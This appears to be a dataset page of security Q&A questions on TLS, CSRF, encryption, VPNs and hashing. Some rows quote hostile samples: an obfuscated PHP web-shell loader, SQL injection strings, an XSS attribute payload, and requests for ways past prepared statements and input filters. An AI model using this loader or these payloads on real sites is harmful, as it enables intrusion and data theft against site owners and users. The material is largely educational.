instruction stringlengths 24 29.9k |
|---|
I was thinking of using this functionality in my script, but it seems that importing URL file automatically sets GET method for every URL on the list, so when Active Scan is run, it only performs GET requests for this URLs. I know I can change the method manually with resend option, but I'm implementing tests to be run... |
Note: I have read the answer to this question, but found it unsatisfactory, probably because I don't understand enough about security.
I'm referring to a frontend server-side rendered SPA + a backend API, which needs to use cookies, and needs persistent login. Since I need cookies for server-side authentication, I want... |
In the NVD report for CVE-2019-2130 it shows that the products that are affected are only Android, and the links found in the Mitre page of the CVE lead only to an Android report of the CVE.
This is fine, yet what confused me is why the Ubuntu CVE Tracker page shows this vulnerability is also found in NodeJS and Chromi... |
I have a 3rd party API that I need to connect to and they allow queries that can be formed by changing url parameters.
E.g. /data?startDate=2019-01-01 or /data?name='John Doe'
It is easy to form these queries by concatenating strings, but input cannot be trusted (our API is exposed to end users and accept parameters th... |
I am setting up AWS SFTP which uses s3 to store files. I am setting up sftp to exchange files with third party organisations. When i receive files i want to ensure no malicious content is received. How do i scan objects that arrive into my s3?
I have had a look at google and stackoverflow but not finding any definitive... |
For testing purposes I want to test cross-signing certificates for Windows driver signing. I understand the general concept: Two root CAs, one root CA cross-signs the other root CA's public key.
However, I couldn't find any information on how to cross-sign the root CA's public key exactly. When I simply sign the public... |
Are User Credentials on Android such as "user key", "user certificate", and "CA certificate" only used to connect to a single specific network?
In other words, will the network admins be able to see my web traffic if i'm using cellular data and or a different WiFi network that doesn't use those certificates?
|
Most of the new authentication solutions (IDaaS) are focused on HTTP (for example implementing SAML and OIDC). What protocols does Active Directory support, that are not normally supported by IDaaS?
|
How do we know any device is doing what it is supposed to do? For example, Android is an open-source OS (ignore google libraries for now) and they do claim that all passwords will only be stored on the device. But what if they are storing it on their servers and this piece of code is not in the open-source version but ... |
I'm writing reliable UDP implementation and I want it to be secure. Also, I want to make use of elliptic curve cryptography. I don't have the proper education to really understand the math behind this kind of cryptography, but I understand how to use it (at least in general).
Given the next preconditions, is this algor... |
I'm working on a web app, and I know little about security/cryptography (for now, still learning) but I'm trying to set up a front-end where:
At the very beginning, the user puts in their private key.
The key is stored as a variable in javascript.
Any time the user does anything to interact with the backend, the key is... |
My current job involves auditing systems for compliance with various policies. One of these policies is that all network connections must be logged, so that the origin of the connection (IP address and port) is available to trace any unauthorized or malicious access. Currently we use TCP Wrappers (either the libwrap li... |
I've worked for a variety of technologies companies. In working for startups I've noticed a wide variety of opinions about whether sharing calendars is a security risk. I can imagine that it would be bad if someone learned that sales was having a meeting with Company X. But the risk would be manageable by the indivi... |
I'm currently studying for my Comptia Security+ exam and on a practice test online I got this question:
Or, represented as text:
▶ Which of the following are hashing algorithms? (Select all that apply)
----------------------------------
✔️ ☑️ MD5 (☑️ Your answer)
✔️ ☑️ RIPEMD (☑️ Your answer)
☐ ➖ Bcrypt (❌ Your... |
I know that prepared statements are used to handle input at the front end. However I was wondering how do you bypass a prepared statement? I have seen some people talk about string concentration but I’m not sure.
The language I’m using is Java so I was wondering how someone can bypass a prepared statement. I know it’s ... |
I was looking for lots of information about cookies recently. What attracted me the most was the fact that cookies come in all forms and can be hijacked through arp poisining and spoofing on the local network or wirelessly.
I did not see one case that I would like to ask about.
Can a potential hacker literally crack an... |
I found a website that has a well implemented CORS configuration, but for some reason I am able to insert two Origin headers in a POST request, and both of these values are reflected in the reponse.
So if I try:
Host: example.com
Connection: close
Origin: https://evil.com
Origin: https://example.com
The response will ... |
I am building a website that requires the users to login through username and password. I have the passwords encrypted in my database with bcrypt. On the back end, I receive the usernme and password of the user, and use this code to check it:
bcrypt.compare(req.body.password, result[0].password, function(err, success) ... |
A friend's PC got infected with BORA ransomware 2 days ago and I was wandering if his files would have been encrypted if he had made them 'read only' before the ransomware had struck.
Is it possible that he could have protected his data this way or is the ransomware still able to modify them?
|
Suppose I have n subordinates at work. Any subordinate should be able to submit his or her report anonymously to me via digital means.
Also suppose that I have no means of broadcasting any form of information securely to my subordinates. That is - any message I broadcast to my subordinates should be able to be sniffed ... |
Please excuse the terminology as I'm no expert in information security.
My question is pretty straightforward:
How can I guarantee* that I am the only one with access to my local machine's data (screen, microphone, camera, files)?
* With the assumption that no one will physically come into my apartment and mess with ... |
I scanned a web app using Burp and it reported this vulnerability. When I click on the issue it show this request and response:
Request:
GET / HTTP/1.1
Host: xxxxx.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
Response:
HTTP/1.1 200 OK Server: Burp Collaborator htt... |
Consider a multi-tenant SaaS application that uses domain names to identify which customer to serve. Customers access the application using client001.ourdomain.com, client002.ourdomain.com, etc. The code base is shared among all customers.
Two obvious security concerns for me are:
Predictable URLs allow anyone to easi... |
A while back I went to a threat modelling workshop that had a card deck with various actors, their motivations, and their methods.
I found this extremely helpful to frame the discussion around the probability / motivation for an attack to occur, in a way that neither OWASP Cornucopia neither "Elevation of Privilege" ... |
We are using PAP to pass data between our on-prem VMware and on-prem NPS server. But our on-prem NPS Server passes data to Azure MFA in the cloud. I want to ensure a stronger protocol than PAP is being used to pass data from NPS server to Azure MFA in the cloud, but I'm struggling to find an answer to what protocol is ... |
Suppose you are designing software to manage bank balances for different accounts belonging to a given customer. A single customer can have multiple accounts with a bank, such as a credit card account, a checking account, and a savings account. You know that there will be a large number of applications running on the... |
I think in the security field it is a well-known fact that its not a good idea to let the web server vendor (e.g. Apache) and the version be visible to the outside as this can be used to launch targeted attacks against a specific server implementation.
I launched an Apache 2.4 Docker container to see whether that is st... |
I installed a DNS server on a Raspberry PI to monitor DNS requests. One request that is curious is "fscta65w.com." It keeps showing up in the querlog from a macbookPro but I can't seem to find out the purpose of it.
My question is, how can I find the process that is submitting that request so I can delete/shutdown?
And... |
So I am trying to bypass metacharacter filtering.
I want to know how do you start an injection. For example if the ' is filtered how do you begin the input.
If i did ' or 1=1# without filtering it would work. But since the ' is filtered how do you begin an injection. I tried hexidecimal 27 or 1=1#.
|
Can a hacker install a spying software or hack an unrooted Android device with physical access?
|
If a laptop has WIFI but it is disabled in the Device Manager, can it still be used to gain access to the machine?
|
Is having screen sharing service with ara.apple.com safe?
I had screensharing service with ara.apple.com(https://ara-prn.apple.com/) which is official apple website for apple products support. And they wanted me to install an app after entering session key and they said the app will self-destruct once support session e... |
The Tor project has recently released a browser extension called snowflake which allows users in countries with heavy censorship to access websites which would otherwise be blocked using the connections of volunteers as proxies. They have stated -
There is no need to worry about which websites people are accessing thr... |
Introduction of the cryptosystem
Let's say we have a system with a central server SRV that is considered secure (communication with this server is secured too with TLS).
Then let's say we have many clients CLIENT which are supposed to be secure too (their firmware is encrypted with a per-client unique, non readable key... |
A system I'm studying uses the following mechanism: a 19-digit integer is hashed via the MD5 algorithm and the salt of the integer is shown in plain sight to the user before they take an irreversible action relevant to trying to guess the first 2 digits of said number.
My intuition is that this is not secure. With 10^1... |
I was asked this question "If the cookie is marked secure and the web application is over http , Cannot we access the application ?"
Considering the secure flag is to ensure the cookie is sent only on encrypted network
|
Is it possible to use the "2038 bug" on all kinds of systems / sites that use a calendar and similar features, in order to exploit a certain system in some way?
|
I've implemented a client-server-model that runs locally on a linux machine. I've used the (old) ONC RPC / Oracle RPC based on an UNIX domain socket.
There are some ways to authenticate the client, such as UNIX authentication.
But now I also want to authenticate the server towards the client. I want to make sure that e... |
if <> tags are html-escaped but " is not escaping, can I have xss? I have already tried " onmouseover="alert('xss');" but doesn't seem like it is working. I have a feeling that xss resides in it because all characters are not properly escaped.
Below is the exact HTML:
<p class="messageText" style="max-height: 250px; o... |
Is it true that in GCP, accounts that will be used to log in to linux machines can be provisioned in Google Cloud IAM? And if so, how is it achieved (i.e. using directory services or by amending etc files)?
|
When I enabled BitLocker on my system-drive, I wasn't asked to select an unlock-method. I didn't have to enter any new passwords/keys. I only selected a few options for the encryption, and the process completed.
I'm not very familiar with how BitLocker works.
My questions are thus. With what key has my system-drive bee... |
(Apologies for multi-question. Theme is the same, but there are quite a few edge cases.)
Browsing the web, I come across resources (see below), but they don't make this quite clear what the situation really is, so this is my attempt to clarify and gather info that I am missing.
Ways to transition
I gather there are at... |
I used the spectre-meltdown-checker, version 0.42, without any option resulting in all-green results. But, in a help page, I found the --paranoid switch, which resulted in about a half of later CVEs to become red. I read what it told me, that for full mitigation I would have to disable hyper-threading, it scared me off... |
I'm sure there are instances of this, but I ask it because malwares are often so makeshift that I could definitely see their authors purposely using weaker forms of authentication to perform communications (or no authentication at all) just for the sake of time or efficiency. I'm wondering what the general trend is in ... |
Upon opening Microsoft edge, I clicked on a homepage Fox News article about a new bill being introduced. While reading, I looked down and checked my phone, and looked up to see my browser redirecting to a weird ".xyz" page that had one of those fake "Critical Edge error" messages and a spammy popup box about contacting... |
What i want to do is access the Content-type header which is placed under the Access-Control-Allow-Headers header as i want to attempt to change json to xml on a web application im working on to check if its vulnerable to XML or XXE injection.
|
Are off the shelf CSP alternatives like Ensighten used by BritishAirways any good/safe? As and example, the way the bootstrap script seems to work is to bind its own proxy methods to XMLHttpRequest Open/Send which then check the requested domain against the list of allowed domains. Anything attempting to talk to unappr... |
Alright here is my proposal:
Use a hash of a login token as the anti-CSRF token.
Why this is a good idea?
Prevents having to store anything extra on the client, the server, and less network traffic as we don't need to transfer an additional cookie on every request
All the benefits of cookie based CSRF token
Login toke... |
as title says I'm writing a paid Desktop App that automates some process, it indirectly requires internet connection because MY app automates another Desktop app that requires internet connection. There is no webpage or such, only my Desktop App and my API.
Normal Workflow:
User opens Desktop App: Login prompt shows o... |
Having weak passwords are so easily cracked by hackers and quantum computers that people introduced an extra layer of security, called Two Factor Authentication. How it works is it sends a message to your phone number and you enter the code that you received or you use an authenticator app such as "Google Authenticator... |
I just want to know how CVE codes are assigned by the vulnerability scanners, while it found the particular vulnerability.
|
I knew that the format of the TLS handshake message is as below.
"Record header+Handshake layer header+ Handshake message"
Now i have confusion while analyzing the TLS handshake messages on TCP.
How the structure would look like from server in response to client hello.
Note:- Since TCP can handle segmentation i believe... |
I have just updated TrueCrypt from version 7.1a to 7.2. Upon next system restart I have noticed that bootloader was updated as well, because it now shows message about TrueCrypt being not safe.
There was no information in version 7.2 installer about possible update to bootloader (only about updating Windows version of ... |
Given a serverless deployment of some kind (i.e. something that relies on AWS Lambda for computing), and secrets stored in AWS Secrets Manager, what difference from security standpoint is there between the following two options:
reading secrets from SM at deployment and providing them to Lambdas as ENV variables
readi... |
Suppose I create a word or a PDF document on my home computer. I then save this file to a location on my computer hard drive and email it to a friend as an attachment over gmail.
My friend downloads this file onto their computer and uploads it to a company website.
Can the company see my name and computer ID in the fil... |
From my previous question: How secure is this schema between a Desktop App (c++) and an API (php).
Introduction
I made a paid Desktop-app that required constant internet connection (because of its nature, not because of security or this schema). Because this is an specific situation I decided to design my own schema. ... |
Can someone tell me the what length passwords have been hashed, in every possible combination, in rainbow tables? In MD5 and SHA1. Including all characters (letters upper and lower case, numbers and symbols). In other words, is there a table that has every possible combination of 8 characters? How about 9?
|
I have bought a Wordpress theme and scanned its files on www.themecheck.info. The results show 3 critical alerts and 9 warnings:
Alerts:
Presence of iframes : iframes are sometimes used to load unwanted
adverts and malicious code on another site Found in file vc_gmaps.php. 6: 'link' =>
'https://www.google.com/maps/d/... |
To prevent MITM from my app I will use cert pinning.
To prevent having not approved parties communicate to my server I can use Mutal TLS, which actually accepting communication from trusted sources.
Am I am missing something or it sounds the same?
|
Capital One recently sent my plastic credit card by post mail and its activation code by a separate post mail. What security problem does this mitigate?
If a rogue element has access to my mail box or home, they will have both the plastic card as well as the activation code. The only thing I can think of is that they... |
I need to back up an encrypted drive, if the data gets corrupted I'd have another copy
I don't have another drive that I trust not to have been compromised right now.
My idea is to copy an encrypted image of the drive to the possibly compromised drive, and when I need it, I copy the image back to a secure drive. The da... |
When you connect to a printer on MacOS or Windows, the system stores the printer so you can connect to it later. Does anyone know which criteria is referenced to validate it is the same printer when you connect to it again?
What if a preset printer went offline and another one took its place with the same IP, MAC addre... |
I have a machine that I use only to browse the Internet. What if I blocked all ports on this machine (inbound and outbound) except for port 80 and port 443, and restricted these two ports to an internet browser executable. Would this make my machine more secure?
|
I've been using VeraCrypt / TrueCrypt for years. Now, with a new computer (having Windows 10 Pro) I can consider BitLocker. But, either I am complete ignorant and don't see something awfully obvious or I can't understand how can BitLocker be considered safer than TrueCrypt. Or safe at all.
Two scenarios:
Disk encrypte... |
I am asking the questions because of the latest news: https://www.bbc.com/news/world-middle-east-50095448
I wonder how the ISP can detect the use of call and video calls, without detecting or blocking the rest of the app?
|
CVV is a security feature.
Why isn't it handled as a PIN and kept secret? I see that's convenient to have the number on the back (or front, in some rare cases), but so would be to write your PIN on your bank cards.
|
If you're wondering why would I want that - it's for my own security: against identity and data theft.
|
I'm working on a project to encrypt many files with a single password.
The steps I will employ to encrypt the files are:
user will execute a command similar to tool --encrypt --recurse directories/to/recurse and-other-files.txt
the user will be prompted for a password
two 64 byte crypto random salts and a 16 byte cryp... |
I downloaded a Qubes OS ISO and I'm trying to verify its legitimacy using this guide. GPG was behaving weirdly, so I created a separate user with a separate keyring to reproduce the issue.
When I try to verify the key on my Debian system, the signature on the release signing key is not there:
$ gpg --fetch-keys https:/... |
Let's say I buy a second-hand USB dongle and put in a pre-paid and unregistered data SIM card. At the time of the purchase of both items, my face was covered, I paid cash and I live 500 miles from the purchase location.
I stick the dongle into my laptop that runs a Linux live operating system. Once in a while, I go to ... |
I heard from someone that SubtleCrypto should be used in client-server communications to login and register, then he told me it would be useful even if someone took control in the middle of the HTTPS connection. I always thought that once the TLS failed, nothing else could be reliable (at least between 2 peers.)
Since ... |
I set up DKIM, DMARC and SPF on my domain/server a few years ago, and never touched it again since then.
Here are my DNS records (my domain is mydomain.com and my IP addresses are 1.1.1.1 and 2001::1):
mydomain.com. 0 TXT "v=spf1 mx a ptr ip4:1.1.1.1 ip6:2001::1 include:_spf.google.com ?all"
dkim._domainkey.myd... |
I've been reading a lot about WEP cracking on online resources very recently, however there is one question that no website gives answer to I believe.
I would like to first understand the theory very well.
I understand how RC4 stream cipher works:
The IV being very short, with an high enough number of packets (ARP re... |
I am thinking about subscribing to a vpn service and I want to know that if my computer gets hacked and the hacker sees my vpn subscription details, could he use them later?
If I do a fresh os install and change vpn password will everything be ok?
For example with an email if someone finds your password all you have to... |
Imagine that I'm an evil genius, and I had the brilliant idea of creating a botnet for brute forcing passwords. Or I'm just the owner of the Echelon, and I have a farm of distributed servers around the globe to decrypt passwords.
How long and complex should a password be to resist such attack (and no more sophisticate ... |
I am trying to crack a md5 hash using a word list with john the ripper i used the following command:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt.gz /root/md5.txt
And i always get the following error:
**Using default input encoding: UTF-8**
**"No password hashes loaded (see FAQ)"**
The word lis... |
I've dumped the secrets from a TLS handshake into a text file but I don't understand what the different secrets are. I have:
SERVER_HANDSHAKE_TRAFFIC_SECRET
EXPORTER_SECRET
SERVER_TRAFFIC_SECRET_0
CLIENT_HANDSHAKE_TRAFFIC_SECRET
CLIENT_TRAFFIC_SECRET_0
HANDSHAKE_TRAFFIC_SECRET I guess is the Diffie-Hellman Secret? I ha... |
I am trying to understand how DOM based XSS work, e.g. from this post, I managed to reproduce it in IE11, but e.g. Chrome and Firefox are immune at least against this exact example.
What happens is that document.baseURI and similar objects do return a string that is encoded, so unless you explicitly write code to decod... |
i wanted to understand difference in the "Finished message" when different cipher site selected with encryption and with out encryption.
I am able to find the format of Finished message when the selected cipher suite includes encryption as below.
when the selected cipher suite is :-"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"... |
I have heard that there will always be vulnerabilities in codes, software. However, I don't understand why it is not possible to have an exploit-free software. If companies keep updating their software, eventually there will be no vulnerabilities, right?
|
For some reason i access my internet through a HTTP proxy.
Is there a way to tunnel my whole Linux machine (currently am using ubuntu 18.04) through http proxy.
If i change proxy setting in the Ubuntu Network Settings the http proxy only works on the browsers. Other apps are left out.
My current workaround is using a L... |
I am trying to exploit a Windows 7 VM using metasploit. I was able to open a java meterpreter session and I want to access a native meterpreter. To do so I exported a meterpreter/reverse_tcp payload to an .exe using msfvenom:
msfvenom -p windows/meterpreter_bind_tcp LPORT=5555 -f exe > bindtcp5555.exe
I then uploaded t... |
I'm writing an API-fuzzer and I want to detect if a sequence cause falling down of an endpoint of some service. Of course I can get 500 response code, but it's may be called from code of an endpoint. And there are any exact way to find out if a server is down?
I don’t know in advance what kind of balancing is on the se... |
I wonder what the advantages of http CONNECT request over TLS are.
I understand that the CONNECT request data from client to proxy is encrypted. But I want to know more specific advantages.
Which attack is possible when the data between them is NOT encrypted? Is it fatal and must I establish SSL session between client ... |
It is evident that programming knowledge such as Python, C, or bash scripting is required for most cybersecurity jobs.
What makes it somehow mandatory to have knowledge in this area and how can it help?
Is this knowledge for customization and improving existing software?
|
I am referring this post https://www.openssl.org/blog/blog/2015/05/20/logjam-freak-upcoming-changes/ and trying to see a website is vulnerable to Logjam or not.
I try with www.google.com:443 but I am getting Server Temp Key: X25519, 253 bits. Does this mean Google is vulnerable to LogJam?
(The command to use is $ opens... |
Our rails application has a feature where admin can from trigger sending verify email to users that haven't been verified yet but not to verified ones.
However, it was pointed out that by intercepting this PUT request and modifying the id to another one it was possible to send verify email even to the already verified... |
I would like to implement a DNS client which should be able to resolve any valid domain public, private or otherwise (tor,i2p). What's the best way to achieve this?
I know that I need to pick a particular DNS server based on the TLD, for e.g, in order to resolve Tor I should have access to Tor network.
if it's .onion ... |
I'm trying to parse Debian OVAL feeds to establish if some packages are vulnerable or not. I'm using criterions to establish what's the vulnerable version for a package, however often there are entries saying that "version is earlier than 0", e.g.
<criteria comment="Release section" operator="AND">
<criter... |
I just started with recon-ng today, I was following tutorials but every tutorial is outdated with most of them describing the functions of v4.
I was able to update myself with simple additions like the marketplace and the new way to add modules etc. But, for example, if I'm using netblocks module "whois_orgs", how do I... |
My Android (8.0) phone was pickpocketed from me yesterday. It was immediately turned off by the thief and when I tried to locate it using Find My Device it shows as offline.
As a programmer and a security enthusiast, I started to worry about what data can be vulnerable on the phone. I had a screen lock on but it didn'... |
A recent employment test prompted me to perform an SQL injection to gain access into their website.
Using manual and automated (Burp) methods, I was able to find out the form is definitely vulnerable to SQL Injection attacks, but every time I tried to pass any payloads into the E-mail/username field
(eg: admin' or '1... |
What is the point of this shell code? There is no other code in the file.
@preg_match_all("/\t \t(.+)\t\t/Ui",@file_get_contents(__FILE__),$r);
$w="";foreach($r[1] as $v){@$w.=@chr(@strlen($v));}
$e=explode("!",$w);@$e[0](/* */ @__DIR__.@$e[1],@unserialize(@$e[2]));
@include("tmp.php");
|
I am quite happy with, indeed grateful for, protonmail. There is one point I'd like to understand better regarding end-to-end encryption. I asked this twice at protonmail.com, and twice it was removed by the moderator. I hope someone here can answer.
I infer that an outgoing message is transmitted via https to the pr... |
Scenario: A high level access account on a single machine, where the account is created by the system/application with a secure password, without exposing the password to a human or to any other machines.
No one knows or can know the password. (Hypothetically the password could be extracted but only if the system is ... |
Can a website exploit kit theoretically contain a bootkit (it flashes your UEFI/BIOS)?
|
In AWS docs page has the following instructions to upload files to an AWS bucket from browser: https://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectPOST.html
This solution send to browser a policy and a signature using the secret key that is validated on POST. Also, exposes the AWS Key ID (but noy AWS Secret Key).... |
There's a Xfinity hotspot(xfinitywifi)that I see on my phone that I occasionally use for reasons but lately it has been acting up so I contacted Xfinity customer support. They asked for some stuff including the password for the hotspot. The thing is, the hotspot didn't have a password. Customer support tells me that I ... |
VPN companies tell us you're not safe if you're not using a VPN.
What I'm trying to understand is why, as a home user using the internet at large, a VPN into some VPN hosting company and from there out into the internet is any better (security wise) than going out into the internet from my ISP?
I understand that if I V... |
Say, the goal is to facilitate secure communication between two parties. The definition of secure is that
both parties can be sure that they are actually talking to a trusted party, not somebody else
they can be sure that no third party is listening to the communication
Furthermore, I have a Certificate Authority (CA... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.